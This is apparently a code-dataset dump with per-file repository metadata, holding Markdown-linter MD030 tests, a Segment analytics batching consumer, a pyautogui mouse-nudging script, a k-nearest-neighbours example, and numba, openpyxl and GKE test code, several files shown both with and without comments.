+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_single_nested_double.md:7:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_nested_double():
scanner = MarkdownScanner()
supplied_arguments = [
"--disable-rules",
"md007",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:2:5: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)\n"
+ "test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:5:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single_nested_double_2_1():
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"--disable-rules",
"md007",
"scan",
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/bad_spacing_ol_single_nested_double.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 1; Actual: 2] (list-marker-space)"
)
expected_error = ""
execute_results = scanner.invoke_main(arguments=supplied_arguments)
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
| true
| true
|
1c3e7fd1b3bed5afdc913af0be1beeb3fd3079e9
| 4,332
|
py
|
Python
|
analytics/consumer.py
|
heitorsampaio/analytics-python
|
517c812a9c10ee369407521e36c155c738932ae5
|
[
"Unlicense",
"MIT"
] | null | null | null |
analytics/consumer.py
|
heitorsampaio/analytics-python
|
517c812a9c10ee369407521e36c155c738932ae5
|
[
"Unlicense",
"MIT"
] | null | null | null |
analytics/consumer.py
|
heitorsampaio/analytics-python
|
517c812a9c10ee369407521e36c155c738932ae5
|
[
"Unlicense",
"MIT"
] | null | null | null |
import logging
from threading import Thread
import monotonic
import backoff
import json
from analytics.request import post, APIError, DatetimeSerializer
try:
from queue import Empty
except ImportError:
from Queue import Empty
MAX_MSG_SIZE = 32 << 10
# Our servers only accept batches of less than 500KB. The limit here is set slightly
# lower to leave room for extra data that will be added later, e.g. "sentAt".
BATCH_SIZE_LIMIT = 475000
class Consumer(Thread):
"""Consumes the messages from the client's queue."""
log = logging.getLogger('segment')
def __init__(self, queue, write_key, flush_at=100, host=None,
on_error=None, flush_interval=0.5, gzip=False, retries=10,
timeout=15):
"""Create a consumer thread."""
Thread.__init__(self)
# Make consumer a daemon thread so that it doesn't block program exit
self.daemon = True
self.flush_at = flush_at
self.flush_interval = flush_interval
self.write_key = write_key
self.host = host
self.on_error = on_error
self.queue = queue
self.gzip = gzip
# It's important to set running in the constructor: if we are asked to
# pause immediately after construction, we might set running to True in
# run() *after* we set it to False in pause... and keep running
# forever.
self.running = True
self.retries = retries
self.timeout = timeout
def run(self):
"""Runs the consumer."""
self.log.debug('consumer is running...')
while self.running:
self.upload()
self.log.debug('consumer exited.')
def pause(self):
"""Pause the consumer."""
self.running = False
def upload(self):
"""Upload the next batch of items, return whether successful."""
success = False
batch = self.next()
if len(batch) == 0:
return False
try:
self.request(batch)
success = True
except Exception as e:
self.log.error('error uploading: %s', e)
success = False
if self.on_error:
self.on_error(e, batch)
finally:
# mark items as acknowledged from queue
for _ in batch:
self.queue.task_done()
return success
def next(self):
"""Return the next batch of items to upload."""
queue = self.queue
items = []
start_time = monotonic.monotonic()
total_size = 0
while len(items) < self.flush_at:
elapsed = monotonic.monotonic() - start_time
if elapsed >= self.flush_interval:
break
try:
item = queue.get(
block=True, timeout=self.flush_interval - elapsed)
item_size = len(json.dumps(
item, cls=DatetimeSerializer).encode())
if item_size > MAX_MSG_SIZE:
self.log.error(
'Item exceeds 32kb limit, dropping. (%s)', str(item))
continue
items.append(item)
total_size += item_size
if total_size >= BATCH_SIZE_LIMIT:
self.log.debug(
'hit batch size limit (size: %d)', total_size)
break
except Empty:
break
return items
def request(self, batch):
"""Attempt to upload the batch and retry before raising an error """
def fatal_exception(exc):
if isinstance(exc, APIError):
# retry on server errors and client errors
# with 429 status code (rate limited),
# don't retry on other client errors
return (400 <= exc.status < 500) and exc.status != 429
else:
# retry on all other errors (eg. network)
return False
@backoff.on_exception(
backoff.expo,
Exception,
max_tries=self.retries + 1,
giveup=fatal_exception)
def send_request():
post(self.write_key, self.host, gzip=self.gzip,
timeout=self.timeout, batch=batch)
send_request()
| 32.088889
| 79
| 0.559557
|
import logging
from threading import Thread
import monotonic
import backoff
import json
from analytics.request import post, APIError, DatetimeSerializer
try:
from queue import Empty
except ImportError:
from Queue import Empty
MAX_MSG_SIZE = 32 << 10
BATCH_SIZE_LIMIT = 475000
class Consumer(Thread):
log = logging.getLogger('segment')
def __init__(self, queue, write_key, flush_at=100, host=None,
on_error=None, flush_interval=0.5, gzip=False, retries=10,
timeout=15):
Thread.__init__(self)
self.daemon = True
self.flush_at = flush_at
self.flush_interval = flush_interval
self.write_key = write_key
self.host = host
self.on_error = on_error
self.queue = queue
self.gzip = gzip
# It's important to set running in the constructor: if we are asked to
self.running = True
self.retries = retries
self.timeout = timeout
def run(self):
self.log.debug('consumer is running...')
while self.running:
self.upload()
self.log.debug('consumer exited.')
def pause(self):
self.running = False
def upload(self):
success = False
batch = self.next()
if len(batch) == 0:
return False
try:
self.request(batch)
success = True
except Exception as e:
self.log.error('error uploading: %s', e)
success = False
if self.on_error:
self.on_error(e, batch)
finally:
for _ in batch:
self.queue.task_done()
return success
def next(self):
queue = self.queue
items = []
start_time = monotonic.monotonic()
total_size = 0
while len(items) < self.flush_at:
elapsed = monotonic.monotonic() - start_time
if elapsed >= self.flush_interval:
break
try:
item = queue.get(
block=True, timeout=self.flush_interval - elapsed)
item_size = len(json.dumps(
item, cls=DatetimeSerializer).encode())
if item_size > MAX_MSG_SIZE:
self.log.error(
'Item exceeds 32kb limit, dropping. (%s)', str(item))
continue
items.append(item)
total_size += item_size
if total_size >= BATCH_SIZE_LIMIT:
self.log.debug(
'hit batch size limit (size: %d)', total_size)
break
except Empty:
break
return items
def request(self, batch):
def fatal_exception(exc):
if isinstance(exc, APIError):
return (400 <= exc.status < 500) and exc.status != 429
else:
# retry on all other errors (eg. network)
return False
@backoff.on_exception(
backoff.expo,
Exception,
max_tries=self.retries + 1,
giveup=fatal_exception)
def send_request():
post(self.write_key, self.host, gzip=self.gzip,
timeout=self.timeout, batch=batch)
send_request()
| true
| true
|
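As a side note on the analytics/consumer.py listing above: the batching in Consumer.next() stops for one of three reasons — flush_at items collected, flush_interval elapsed, or the serialized batch reaching the size limit. The standalone sketch below reproduces just that cut-off logic with the standard library; the function name and constant values are illustrative (flush_at is shrunk to 3 for the demo), time.monotonic stands in for the external monotonic package, and this is not the library's own API.

import json
import time
from queue import Queue, Empty

FLUSH_AT = 3            # assumed small value for the demo (the Consumer above defaults to 100)
FLUSH_INTERVAL = 0.5    # seconds, same default as above
BATCH_SIZE_LIMIT = 475000

def next_batch(queue):
    # Drain the queue into one batch, mirroring the three stop conditions.
    items, total_size = [], 0
    start = time.monotonic()
    while len(items) < FLUSH_AT:
        elapsed = time.monotonic() - start
        if elapsed >= FLUSH_INTERVAL:
            break                                   # time budget spent
        try:
            item = queue.get(block=True, timeout=FLUSH_INTERVAL - elapsed)
        except Empty:
            break                                   # nothing left to collect
        items.append(item)
        total_size += len(json.dumps(item).encode())
        if total_size >= BATCH_SIZE_LIMIT:
            break                                   # batch large enough to send
    return items

q = Queue()
for i in range(5):
    q.put({"event": "demo", "n": i})
print(next_batch(q))                                # at most FLUSH_AT items per call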
1c3e8090dc3d1bdc87269a5e3aa02ad54cb1c41d
| 276
|
py
|
Python
|
moveMouse.py
|
helloprasanna/python
|
1f218ddf84bc082dca5906833238389011ae344b
|
[
"MIT"
] | null | null | null |
moveMouse.py
|
helloprasanna/python
|
1f218ddf84bc082dca5906833238389011ae344b
|
[
"MIT"
] | null | null | null |
moveMouse.py
|
helloprasanna/python
|
1f218ddf84bc082dca5906833238389011ae344b
|
[
"MIT"
] | null | null | null |
import pyautogui
import time
print('Press Ctrl-C to quit.')
try:
while True:
x, y = pyautogui.position()
pyautogui.moveTo(x+5, y+5)
print('X : {}, Y : {} '.format(x, y))
time.sleep(5)
except KeyboardInterrupt:
print('Terminated \n')
| 18.4
| 45
| 0.57971
|
import pyautogui
import time
print('Press Ctrl-C to quit.')
try:
while True:
x, y = pyautogui.position()
pyautogui.moveTo(x+5, y+5)
print('X : {}, Y : {} '.format(x, y))
time.sleep(5)
except KeyboardInterrupt:
print('Terminated \n')
| true
| true
|
1c3e81161bf35beb9539000f3765d21bce5ca285
| 2,020
|
py
|
Python
|
code/knn.py
|
sornalingam/ml-glossary
|
1ef2d23fb73ed785fda9b5d37d465d6d05c80f37
|
[
"MIT"
] | 4
|
2020-09-26T01:26:28.000Z
|
2021-08-05T20:54:04.000Z
|
code/knn.py
|
tusharmishra288/ml-glossary
|
eac8d91097d6f16801d46cf0c68ae667f49f0eda
|
[
"MIT"
] | null | null | null |
code/knn.py
|
tusharmishra288/ml-glossary
|
eac8d91097d6f16801d46cf0c68ae667f49f0eda
|
[
"MIT"
] | null | null | null |
from collections import Counter
from math import sqrt
def euclidean_distance(point1, point2):
distance = 0
for i in range(len(point1)):
        distance += (point1[i] - point2[i]) ** 2
return sqrt(distance)
def mean(labels):
return sum(labels) / len(labels)
def mode(labels):
return Counter(labels).most_common(1)[0][0]
def KNN(training_data, target, k, func):
    neighbors = []
    # For each example in the training data, measure how far it is from the target
    for index, data in enumerate(training_data):
        # Distance between the target and the current example's features (label excluded)
        distance = euclidean_distance(data[:-1], target)
        neighbors.append((distance, index))
    sorted_neighbors = sorted(neighbors)
    # Pick the first K entries from the sorted list
    k_nearest = sorted_neighbors[:k]
    # Get the labels of the selected K entries
    k_nearest_labels = [training_data[i][1] for distance, i in k_nearest]
    # For regression return the mean of the K labels; for classification return their mode.
    return k_nearest, func(k_nearest_labels)
def main():
"""
# Regression Data(Column 0 : Height(inch), Column 1: Weight(lb))
"""
reg_data = [
[73.84, 241.89],
[68.78, 162.31],
[74.11, 212.74],
[71.73, 220.04],
[69.88, 206.34],
[67.25, 152.21],
[63.45, 156.39]
]
target_data = [70]
reg_k_nearest_neighbors, reg_prediction = KNN(
reg_data, target_data, k=3, func=mean
)
print(reg_prediction)
    # Classification data (column 0: age, column 1: likes paragliding or not)
clf_data = [
[26, 1],
[20, 1],
[22, 1],
[19, 1],
[28, 0],
[33, 0],
[30, 0],
[50, 0],
]
target_data2 = [32]
clf_k_nearest_neighbors, clf_prediction = KNN(
clf_data, target_data2, k=3, func=mode
)
print(clf_prediction)
if __name__ == '__main__':
main()
| 26.933333
| 89
| 0.585149
|
from collections import Counter
from math import sqrt
def euclidean_distance(point1, point2):
distance = 0
for i in range(len(point1)):
        distance += (point1[i] - point2[i]) ** 2
return sqrt(distance)
def mean(labels):
return sum(labels) / len(labels)
def mode(labels):
return Counter(labels).most_common(1)[0][0]
def KNN(training_data, target, k, func):
    neighbors = []
for index, data in enumerate(training_data):
distance = euclidean_distance(data[:-1], target)
neighbors.append((distance, index))
sorted_neighbors = sorted(neighbors)
k_nearest = sorted_neighbors[:k]
k_nearest_labels = [training_data[i][1] for distance, i in k_nearest]
    return k_nearest, func(k_nearest_labels)
def main():
reg_data = [
[73.84, 241.89],
[68.78, 162.31],
[74.11, 212.74],
[71.73, 220.04],
[69.88, 206.34],
[67.25, 152.21],
[63.45, 156.39]
]
target_data = [70]
reg_k_nearest_neighbors, reg_prediction = KNN(
reg_data, target_data, k=3, func=mean
)
print(reg_prediction)
clf_data = [
[26, 1],
[20, 1],
[22, 1],
[19, 1],
[28, 0],
[33, 0],
[30, 0],
[50, 0],
]
target_data2 = [32]
clf_k_nearest_neighbors, clf_prediction = KNN(
clf_data, target_data2, k=3, func=mode
)
print(clf_prediction)
if __name__ == '__main__':
main()
| true
| true
|
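A quick hand check of the knn.py demo above: the three training heights closest to the regression target [70] are 69.88, 68.78 and 71.73, so the prediction is the mean of their weights, (206.34 + 162.31 + 220.04) / 3 = 196.23; for the classification target [32] the three nearest ages are 33, 30 and 28, all labelled 0, so the mode is 0. The sketch below assumes the functions and data lists from that file (KNN, mean, mode, reg_data, clf_data) are pasted into the same module — it is a verification aid, not part of the original file.

# Assumes KNN, mean, mode, reg_data and clf_data from knn.py above are in scope.
_, reg_pred = KNN(reg_data, [70], k=3, func=mean)
assert round(reg_pred, 2) == 196.23   # mean weight of the 3 nearest heights

_, clf_pred = KNN(clf_data, [32], k=3, func=mode)
assert clf_pred == 0                  # majority label among the 3 nearest ages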
1c3e81bc03e97828c120842a812e728cfce91939
| 838
|
py
|
Python
|
numba/cuda/tests/cudapy/test_userexc.py
|
uw-ipd/numba
|
26dde2b28cadda403a5549a84dc1698900b23f74
|
[
"BSD-2-Clause"
] | 3
|
2019-09-30T20:00:36.000Z
|
2020-07-13T04:17:15.000Z
|
numba/cuda/tests/cudapy/test_userexc.py
|
uw-ipd/numba
|
26dde2b28cadda403a5549a84dc1698900b23f74
|
[
"BSD-2-Clause"
] | null | null | null |
numba/cuda/tests/cudapy/test_userexc.py
|
uw-ipd/numba
|
26dde2b28cadda403a5549a84dc1698900b23f74
|
[
"BSD-2-Clause"
] | 1
|
2020-05-07T11:36:27.000Z
|
2020-05-07T11:36:27.000Z
|
from __future__ import print_function, absolute_import, division
from numba.cuda.testing import unittest, SerialMixin
from numba import cuda
class MyError(Exception):
pass
class TestUserExc(SerialMixin, unittest.TestCase):
def test_user_exception(self):
@cuda.jit("void(int32)", debug=True)
def test_exc(x):
if x == 1:
raise MyError
elif x == 2:
raise MyError("foo")
test_exc(0) # no raise
with self.assertRaises(MyError) as cm:
test_exc(1)
self.assertEqual("tid=[0, 0, 0] ctaid=[0, 0, 0]", str(cm.exception))
with self.assertRaises(MyError) as cm:
test_exc(2)
self.assertEqual("tid=[0, 0, 0] ctaid=[0, 0, 0]: foo", str(cm.exception))
if __name__ == '__main__':
unittest.main()
| 26.1875
| 81
| 0.601432
|
from __future__ import print_function, absolute_import, division
from numba.cuda.testing import unittest, SerialMixin
from numba import cuda
class MyError(Exception):
pass
class TestUserExc(SerialMixin, unittest.TestCase):
def test_user_exception(self):
@cuda.jit("void(int32)", debug=True)
def test_exc(x):
if x == 1:
raise MyError
elif x == 2:
raise MyError("foo")
test_exc(0)
with self.assertRaises(MyError) as cm:
test_exc(1)
self.assertEqual("tid=[0, 0, 0] ctaid=[0, 0, 0]", str(cm.exception))
with self.assertRaises(MyError) as cm:
test_exc(2)
self.assertEqual("tid=[0, 0, 0] ctaid=[0, 0, 0]: foo", str(cm.exception))
if __name__ == '__main__':
unittest.main()
| true
| true
|
1c3e822ee939e2be140a15ab1d0164a58d5ed646
| 7,384
|
py
|
Python
|
openpyxl/tests/test_cell.py
|
Wyss/customarrayformatter
|
40e395fb272e8e69bf64056748a87c0df716e2a3
|
[
"MIT"
] | null | null | null |
openpyxl/tests/test_cell.py
|
Wyss/customarrayformatter
|
40e395fb272e8e69bf64056748a87c0df716e2a3
|
[
"MIT"
] | null | null | null |
openpyxl/tests/test_cell.py
|
Wyss/customarrayformatter
|
40e395fb272e8e69bf64056748a87c0df716e2a3
|
[
"MIT"
] | null | null | null |
# file openpyxl/tests/test_cell.py
# Copyright (c) 2010-2011 openpyxl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# @license: http://www.opensource.org/licenses/mit-license.php
# @author: see AUTHORS file
# Python stdlib imports
from datetime import time, datetime, timedelta
# 3rd party imports
from nose.tools import eq_, raises, assert_raises #pylint: disable=E0611
# package imports
from openpyxl.worksheet import Worksheet
from openpyxl.workbook import Workbook
from openpyxl.shared.exc import ColumnStringIndexException, \
CellCoordinatesException, DataTypeException
from openpyxl.shared.date_time import CALENDAR_WINDOWS_1900
from openpyxl.cell import column_index_from_string, \
coordinate_from_string, get_column_letter, Cell, absolute_coordinate
import decimal
def build_dummy_worksheet():
class Ws(object):
class Wb(object):
excel_base_date = CALENDAR_WINDOWS_1900
encoding = 'utf-8'
parent = Wb()
title = "Dummy Worksheet"
return Ws()
def test_coordinates():
column, row = coordinate_from_string('ZF46')
eq_("ZF", column)
eq_(46, row)
@raises(CellCoordinatesException)
def test_invalid_coordinate():
coordinate_from_string('AAA')
@raises(CellCoordinatesException)
def test_zero_row():
coordinate_from_string('AQ0')
def test_absolute():
eq_('$ZF$51', absolute_coordinate('ZF51'))
def test_absolute_multiple():
eq_('$ZF$51:$ZF$53', absolute_coordinate('ZF51:ZF$53'))
def test_column_index():
eq_(10, column_index_from_string('J'))
eq_(270, column_index_from_string('jJ'))
eq_(7030, column_index_from_string('jjj'))
def test_bad_column_index():
@raises(ColumnStringIndexException)
def _check(bad_string):
column_index_from_string(bad_string)
bad_strings = ('JJJJ', '', '$', '1',)
for bad_string in bad_strings:
yield _check, bad_string
def test_column_letter_boundries():
assert_raises(ColumnStringIndexException, get_column_letter, 0)
assert_raises(ColumnStringIndexException, get_column_letter, 18279)
def test_column_letter():
eq_('ZZZ', get_column_letter(18278))
eq_('JJJ', get_column_letter(7030))
eq_('AB', get_column_letter(28))
eq_('AA', get_column_letter(27))
eq_('Z', get_column_letter(26))
def test_initial_value():
ws = build_dummy_worksheet()
cell = Cell(ws, 'A', 1, value='17.5')
eq_(cell.TYPE_NUMERIC, cell.data_type)
class TestCellValueTypes(object):
@classmethod
def setup_class(cls):
ws = build_dummy_worksheet()
cls.cell = Cell(ws, 'A', 1)
def test_1st(self):
eq_(self.cell.TYPE_NULL, self.cell.data_type)
def test_null(self):
self.cell.value = None
eq_(self.cell.TYPE_NULL, self.cell.data_type)
def test_numeric(self):
def check_numeric(value):
self.cell.value = value
eq_(self.cell.TYPE_NUMERIC, self.cell.data_type)
values = (42, '4.2', '-42.000', '0', 0, 0.0001, '0.9999', '99E-02', 1e1, '4', '-1E3', 4, decimal.Decimal('3.14'))
for value in values:
yield check_numeric, value
def test_string(self):
self.cell.value = 'hello'
eq_(self.cell.TYPE_STRING, self.cell.data_type)
def test_single_dot(self):
self.cell.value = '.'
eq_(self.cell.TYPE_STRING, self.cell.data_type)
def test_formula(self):
self.cell.value = '=42'
eq_(self.cell.TYPE_FORMULA, self.cell.data_type)
self.cell.value = '=if(A1<4;-1;1)'
eq_(self.cell.TYPE_FORMULA, self.cell.data_type)
def test_boolean(self):
self.cell.value = True
eq_(self.cell.TYPE_BOOL, self.cell.data_type)
self.cell.value = False
eq_(self.cell.TYPE_BOOL, self.cell.data_type)
def test_leading_zero(self):
self.cell.value = '0800'
eq_(self.cell.TYPE_STRING, self.cell.data_type)
def test_error_codes(self):
def check_error(cell):
eq_(cell.TYPE_ERROR, cell.data_type)
for error_string in self.cell.ERROR_CODES.keys():
self.cell.value = error_string
yield check_error, self.cell
def test_data_type_check():
ws = build_dummy_worksheet()
cell = Cell(ws, 'A', 1)
cell.bind_value(None)
eq_(Cell.TYPE_NULL, cell._data_type)
cell.bind_value('.0e000')
eq_(Cell.TYPE_NUMERIC, cell._data_type)
cell.bind_value('-0.e-0')
eq_(Cell.TYPE_NUMERIC, cell._data_type)
cell.bind_value('1E')
eq_(Cell.TYPE_STRING, cell._data_type)
@raises(DataTypeException)
def test_set_bad_type():
ws = build_dummy_worksheet()
cell = Cell(ws, 'A', 1)
cell.set_explicit_value(1, 'q')
def test_time():
def check_time(raw_value, coerced_value):
cell.value = raw_value
eq_(cell.value, coerced_value)
eq_(cell.TYPE_NUMERIC, cell.data_type)
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
values = (('03:40:16', time(3, 40, 16)), ('03:40', time(3, 40)),)
for raw_value, coerced_value in values:
yield check_time, raw_value, coerced_value
def test_timedelta():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = timedelta(days=1, hours=3)
eq_(cell.value, 1.125)
eq_(cell.TYPE_NUMERIC, cell.data_type)
def test_date_format_on_non_date():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = datetime.now()
cell.value = 'testme'
eq_('testme', cell.value)
def test_set_get_date():
today = datetime(2010, 1, 18, 14, 15, 20, 1600)
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = today
eq_(today, cell.value)
def test_repr():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
eq_(repr(cell), '<Cell Sheet1.A1>', 'Got bad repr: %s' % repr(cell))
def test_is_date():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = datetime.now()
eq_(cell.is_date(), True)
cell.value = 'testme'
eq_('testme', cell.value)
eq_(cell.is_date(), False)
def test_is_not_date_color_format():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = -13.5
cell.style.number_format.format_code = '0.00_);[Red]\(0.00\)'
eq_(cell.is_date(), False)
| 28.291188
| 121
| 0.676192
|
from datetime import time, datetime, timedelta
from nose.tools import eq_, raises, assert_raises
from openpyxl.worksheet import Worksheet
from openpyxl.workbook import Workbook
from openpyxl.shared.exc import ColumnStringIndexException, \
CellCoordinatesException, DataTypeException
from openpyxl.shared.date_time import CALENDAR_WINDOWS_1900
from openpyxl.cell import column_index_from_string, \
coordinate_from_string, get_column_letter, Cell, absolute_coordinate
import decimal
def build_dummy_worksheet():
class Ws(object):
class Wb(object):
excel_base_date = CALENDAR_WINDOWS_1900
encoding = 'utf-8'
parent = Wb()
title = "Dummy Worksheet"
return Ws()
def test_coordinates():
column, row = coordinate_from_string('ZF46')
eq_("ZF", column)
eq_(46, row)
@raises(CellCoordinatesException)
def test_invalid_coordinate():
coordinate_from_string('AAA')
@raises(CellCoordinatesException)
def test_zero_row():
coordinate_from_string('AQ0')
def test_absolute():
eq_('$ZF$51', absolute_coordinate('ZF51'))
def test_absolute_multiple():
eq_('$ZF$51:$ZF$53', absolute_coordinate('ZF51:ZF$53'))
def test_column_index():
eq_(10, column_index_from_string('J'))
eq_(270, column_index_from_string('jJ'))
eq_(7030, column_index_from_string('jjj'))
def test_bad_column_index():
@raises(ColumnStringIndexException)
def _check(bad_string):
column_index_from_string(bad_string)
bad_strings = ('JJJJ', '', '$', '1',)
for bad_string in bad_strings:
yield _check, bad_string
def test_column_letter_boundries():
assert_raises(ColumnStringIndexException, get_column_letter, 0)
assert_raises(ColumnStringIndexException, get_column_letter, 18279)
def test_column_letter():
eq_('ZZZ', get_column_letter(18278))
eq_('JJJ', get_column_letter(7030))
eq_('AB', get_column_letter(28))
eq_('AA', get_column_letter(27))
eq_('Z', get_column_letter(26))
def test_initial_value():
ws = build_dummy_worksheet()
cell = Cell(ws, 'A', 1, value='17.5')
eq_(cell.TYPE_NUMERIC, cell.data_type)
class TestCellValueTypes(object):
@classmethod
def setup_class(cls):
ws = build_dummy_worksheet()
cls.cell = Cell(ws, 'A', 1)
def test_1st(self):
eq_(self.cell.TYPE_NULL, self.cell.data_type)
def test_null(self):
self.cell.value = None
eq_(self.cell.TYPE_NULL, self.cell.data_type)
def test_numeric(self):
def check_numeric(value):
self.cell.value = value
eq_(self.cell.TYPE_NUMERIC, self.cell.data_type)
values = (42, '4.2', '-42.000', '0', 0, 0.0001, '0.9999', '99E-02', 1e1, '4', '-1E3', 4, decimal.Decimal('3.14'))
for value in values:
yield check_numeric, value
def test_string(self):
self.cell.value = 'hello'
eq_(self.cell.TYPE_STRING, self.cell.data_type)
def test_single_dot(self):
self.cell.value = '.'
eq_(self.cell.TYPE_STRING, self.cell.data_type)
def test_formula(self):
self.cell.value = '=42'
eq_(self.cell.TYPE_FORMULA, self.cell.data_type)
self.cell.value = '=if(A1<4;-1;1)'
eq_(self.cell.TYPE_FORMULA, self.cell.data_type)
def test_boolean(self):
self.cell.value = True
eq_(self.cell.TYPE_BOOL, self.cell.data_type)
self.cell.value = False
eq_(self.cell.TYPE_BOOL, self.cell.data_type)
def test_leading_zero(self):
self.cell.value = '0800'
eq_(self.cell.TYPE_STRING, self.cell.data_type)
def test_error_codes(self):
def check_error(cell):
eq_(cell.TYPE_ERROR, cell.data_type)
for error_string in self.cell.ERROR_CODES.keys():
self.cell.value = error_string
yield check_error, self.cell
def test_data_type_check():
ws = build_dummy_worksheet()
cell = Cell(ws, 'A', 1)
cell.bind_value(None)
eq_(Cell.TYPE_NULL, cell._data_type)
cell.bind_value('.0e000')
eq_(Cell.TYPE_NUMERIC, cell._data_type)
cell.bind_value('-0.e-0')
eq_(Cell.TYPE_NUMERIC, cell._data_type)
cell.bind_value('1E')
eq_(Cell.TYPE_STRING, cell._data_type)
@raises(DataTypeException)
def test_set_bad_type():
ws = build_dummy_worksheet()
cell = Cell(ws, 'A', 1)
cell.set_explicit_value(1, 'q')
def test_time():
def check_time(raw_value, coerced_value):
cell.value = raw_value
eq_(cell.value, coerced_value)
eq_(cell.TYPE_NUMERIC, cell.data_type)
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
values = (('03:40:16', time(3, 40, 16)), ('03:40', time(3, 40)),)
for raw_value, coerced_value in values:
yield check_time, raw_value, coerced_value
def test_timedelta():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = timedelta(days=1, hours=3)
eq_(cell.value, 1.125)
eq_(cell.TYPE_NUMERIC, cell.data_type)
def test_date_format_on_non_date():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = datetime.now()
cell.value = 'testme'
eq_('testme', cell.value)
def test_set_get_date():
today = datetime(2010, 1, 18, 14, 15, 20, 1600)
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = today
eq_(today, cell.value)
def test_repr():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
eq_(repr(cell), '<Cell Sheet1.A1>', 'Got bad repr: %s' % repr(cell))
def test_is_date():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = datetime.now()
eq_(cell.is_date(), True)
cell.value = 'testme'
eq_('testme', cell.value)
eq_(cell.is_date(), False)
def test_is_not_date_color_format():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = -13.5
cell.style.number_format.format_code = '0.00_);[Red]\(0.00\)'
eq_(cell.is_date(), False)
| true
| true
|
1c3e82cc247161ee1625ccb0cabfc3a4f65f897e
| 14,062
|
py
|
Python
|
tests/providers/google/cloud/hooks/test_kubernetes_engine.py
|
wileeam/airflow
|
f46be8152a4d89c57db4ca46f5b3339e4876b723
|
[
"Apache-2.0"
] | 8
|
2017-04-20T16:15:44.000Z
|
2020-10-11T13:44:10.000Z
|
tests/providers/google/cloud/hooks/test_kubernetes_engine.py
|
devlocalca/airflow
|
58c3542ed25061320ce61dbe0adf451a44c738dd
|
[
"Apache-2.0"
] | 219
|
2017-03-15T18:40:16.000Z
|
2022-02-28T22:52:43.000Z
|
tests/providers/google/cloud/hooks/test_kubernetes_engine.py
|
devlocalca/airflow
|
58c3542ed25061320ce61dbe0adf451a44c738dd
|
[
"Apache-2.0"
] | 3
|
2016-07-14T21:51:10.000Z
|
2020-10-12T13:26:36.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import unittest
import mock
from google.cloud.container_v1.types import Cluster
from mock import PropertyMock
from airflow import AirflowException
from airflow.providers.google.cloud.hooks.kubernetes_engine import GKEHook
TASK_ID = 'test-gke-cluster-operator'
CLUSTER_NAME = 'test-cluster'
TEST_GCP_PROJECT_ID = 'test-project'
GKE_ZONE = 'test-zone'
